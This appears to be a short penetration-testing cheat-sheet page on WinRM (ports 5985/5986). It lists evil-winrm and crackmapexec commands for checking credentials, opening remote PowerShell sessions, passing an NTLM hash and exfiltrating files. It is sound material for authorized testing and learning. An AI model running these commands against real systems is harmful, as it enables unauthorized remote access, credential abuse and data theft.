5985/5986 - Evil-winrm

My personal favorite

  1. Check: crackmapexec --verbose winrm <IP> -u <username> -p <password>

  2. Try both ports: evil-winrm -i <IP> -u <username> -p <password> -p <port>

  3. Powershell session: evil-winrm -i <IP> -u <username> -p <password>

  4. Pass the hash (NTLM): evil-winrm -i <IP> -u <username> -H <hash>

  5. Exfil data using Evil-winrm: download <File to be exfiltrated location> <Local location where it should be exfiltrated>

Previous135/593 - RPCNext3306 - MYSQL

Last updated